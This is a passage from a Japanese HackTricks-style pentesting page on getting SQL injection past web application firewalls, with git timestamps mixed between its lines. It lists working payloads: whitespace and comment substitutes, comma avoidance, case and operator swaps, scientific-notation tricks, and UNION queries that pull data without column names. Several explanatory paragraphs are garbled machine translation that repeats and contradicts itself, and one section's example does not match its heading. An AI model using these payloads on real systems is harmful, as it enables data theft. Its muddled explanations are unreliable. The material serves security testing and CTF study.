-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a
```
2023-07-07 23:42:27 +00:00
## WAFバイパス
2023-07-07 23:42:27 +00:00
### スペースなしバイパス
2023-07-07 23:42:27 +00:00
スペースなし(%20- 空白の代替手段を使用したバイパス
2021-06-26 16:09:18 +00:00
```sql
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
```
2023-07-07 23:42:27 +00:00
## No Whitespace - コメントを使用してバイパスする
いくつかの場合では、SQLインジェクションの攻撃を実行する際に、スペースや改行を使用することができません。しかし、代わりにコメントを使用することで、この制限を回避することができます。
以下の例を見てみましょう。
```sql
SELECT/**/username/**/FROM/**/users/**/WHERE/**/id=1
```
このクエリでは、スペースがコメントに置き換えられています。これにより、攻撃者はスペースを使用せずにSQLインジェクションを実行することができます。
このテクニックは、スペースや改行を制限された環境での攻撃に非常に有用です。ただし、注意が必要です。コメント内には、攻撃者が意図しないコードを実行する可能性があるため、慎重に使用する必要があります。
2023-07-07 23:42:27 +00:00
このテクニックを使用する際には、以下のポイントに注意してください。
2023-07-07 23:42:27 +00:00
- コメントの開始と終了の記号を正しく使用してください。一般的には、`/*`と`*/`を使用します。
- コメント内には、攻撃者が実行したいコードが含まれていないことを確認してください。
- コメント内には、攻撃者が意図しないコードを実行する可能性があるため、慎重に使用してください。
このテクニックを使用することで、スペースや改行が制限された環境でもSQLインジェクション攻撃を実行することができます。ただし、注意が必要なので、慎重に使用してください。
2021-06-26 16:09:18 +00:00
```sql
?id=1/*comment*/and/**/1=1/**/--
```
2023-07-07 23:42:27 +00:00
## No Whitespace - パレンテシスを使用してバイパスする
このテクニックは、SQLインジェクションのフィルタリングによってスペースが禁止されている場合に使用されます。スペースを使用せずにSQLクエリを実行するために、パレンテシスを使用してバイパスします。
2023-07-07 23:42:27 +00:00
以下は、このテクニックの例です。
2021-06-26 16:09:18 +00:00
```sql
2023-07-07 23:42:27 +00:00
SELECT/**/username/**/FROM/**/users/**/WHERE/**/id=1
```
2023-07-07 23:42:27 +00:00
このクエリは、スペースを使用せずに`SELECT username FROM users WHERE id=1`と同等の結果を返します。
2021-10-21 23:06:17 +00:00
2023-07-07 23:42:27 +00:00
パレンテシスは、スペースの代わりに使用されるため、フィルタリングされている場合でもクエリを実行することができます。ただし、パレンテシスを使用する場合は、SQL文の構文が正しいことを確認する必要があります。
このテクニックを使用する際には、以下のポイントに注意してください。
- パレンテシスを使用する前に、SQL文の構文を理解してください。
- パレンテシスを使用する際には、適切な位置に配置してください。
- パレンテシスを使用する際には、SQL文の構文が正しいことを確認してください。
このテクニックを使用することで、スペースが禁止されている場合でもSQLインジェクションを実行することができます。ただし、常に慎重に使用し、適切な検証を行ってください。
```sql
?id=(1)and(1)=(1)--
```
### コンマ回避
2023-07-07 23:42:27 +00:00
コンマを使用せずに、OFFSET、FROM、JOINを使用して回避します。
```
LIMIT 0,1 -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
```
2023-07-07 23:42:27 +00:00
### 一般的なバイパス方法
2023-07-07 23:42:27 +00:00
キーワードのブラックリスト - 大文字/小文字を使用してバイパスする
2021-06-26 16:09:18 +00:00
```sql
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
```
2023-07-07 23:42:27 +00:00
## ブラックリストのキーワードを大文字小文字を区別せずに使用する - 同等の演算子を使用してバイパスする
ブラックリストには、SQLインジェクション攻撃を防ぐために禁止されたキーワードが含まれています。通常、ブラックリストは大文字小文字を区別しますが、同等の演算子を使用することで回避することができます。
2023-07-07 23:42:27 +00:00
例えば、ブラックリストには「SELECT」というキーワードが含まれているとします。この場合、以下のような同等の演算子を使用してバイパスすることができます。
2023-07-07 23:42:27 +00:00
- `sElEcT`:大文字小文字を混在させることでキーワードを回避します。
- `SeLeCt`:大文字小文字をランダムに変更することでキーワードを回避します。
- `SEL\ECT`:バックスラッシュを使用してキーワードを回避します。
同様に、他のキーワードも同じ方法で回避することができます。ただし、同等の演算子を使用する場合は、キーワードの意味を変えないように注意する必要があります。
この方法を使用することで、ブラックリストに含まれるキーワードを回避し、SQLインジェクション攻撃を実行することができます。ただし、セキュリティ上のリスクを理解し、適切な許可を得た場合にのみ使用してください。
```
AND -> && -> %26%26
OR -> || -> %7C%7C
= -> LIKE,REGEXP,RLIKE, not < and not >
> X -> not between 0 and X
WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())Then(table_name)END) -> group_concat(if(table_schema=database(),table_name,null))
```
2023-07-07 23:42:27 +00:00
### 科学的表記 WAF バイパス
2023-07-07 23:42:27 +00:00
このトリックの詳細な説明は、[gosecure ブログ](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)で見つけることができます。\
基本的に、WAF をバイパスするために予期しない方法で科学的表記を使用することができます。
2021-11-01 10:18:26 +00:00
```
-1' or 1.e(1) or '1'='1
-1' or 1337.1337e1 or '1'='1
' or 1.e('')=
```
2023-07-07 23:42:27 +00:00
### カラム名の制限をバイパスする
2021-11-01 10:18:26 +00:00
2023-07-07 23:42:27 +00:00
まず、もし**元のクエリとフラグを抽出したいテーブルが同じ数のカラムを持っている場合**、単に `0 UNION SELECT * FROM flag` とするだけで可能です。
2021-10-21 23:06:17 +00:00
2023-07-07 23:42:27 +00:00
カラム名を使用せずにテーブルの3番目のカラムにアクセスすることも可能です。以下のようなクエリを使用します: `SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;`。したがって、SQLインジェクションでは次のようになります:
2021-10-21 23:06:17 +00:00
```bash
# This is an example with 3 columns that will extract the column number 3
-1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;
```
2023-07-07 23:42:27 +00:00
または、**カンマバイパス**を使用することもできます。
2021-10-21 23:06:17 +00:00
```bash
# In this case, it's extracting the third value from a 4 values table and returning 3 values in the "union select"
-1 union select * from (select 1)a join (select 2)b join (select F.3 from (select * from (select 1)q join (select 2)w join (select 3)e join (select 4)r union select * from flag limit 1 offset 5)F)c
```
2023-07-07 23:42:27 +00:00
このトリックは[https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/](https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/)から取得されました。
2021-10-21 23:06:17 +00:00
2023-07-07 23:42:27 +00:00
### WAFバイパス提案ツール
{% embed url="https://github.com/m4ll0k/Atlas" %}
2023-07-07 23:42:27 +00:00
## その他のガイド
* [https://sqlwiki.netspi.com/](https://sqlwiki.netspi.com)
2020-09-25 14:49:19 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
2023-07-07 23:42:27 +00:00
## ブルートフォース検出リスト
2021-06-27 21:56:13 +00:00
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt" %}
2022-04-28 16:01:33 +00:00
2022-10-25 15:56:49 +00:00
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
2023-07-07 23:42:27 +00:00
[**RootedCON**](https://www.rootedcon.com/)は、**スペイン**で最も関連性の高いサイバーセキュリティイベントであり、**ヨーロッパ**でも最も重要なイベントの一つです。この大会は、技術的な知識を促進することを使命としており、あらゆる分野の技術とサイバーセキュリティの専門家にとっての活気ある交流の場です。
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
* あなたは**サイバーセキュリティ会社**で働いていますか? HackTricksであなたの会社を宣伝したいですかまたは、最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロードしたりしたいですか[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクション
* [**公式のPEASSHackTricksのスワッグ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォローしてください。**
* **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
2022-04-28 16:01:33 +00:00
</details>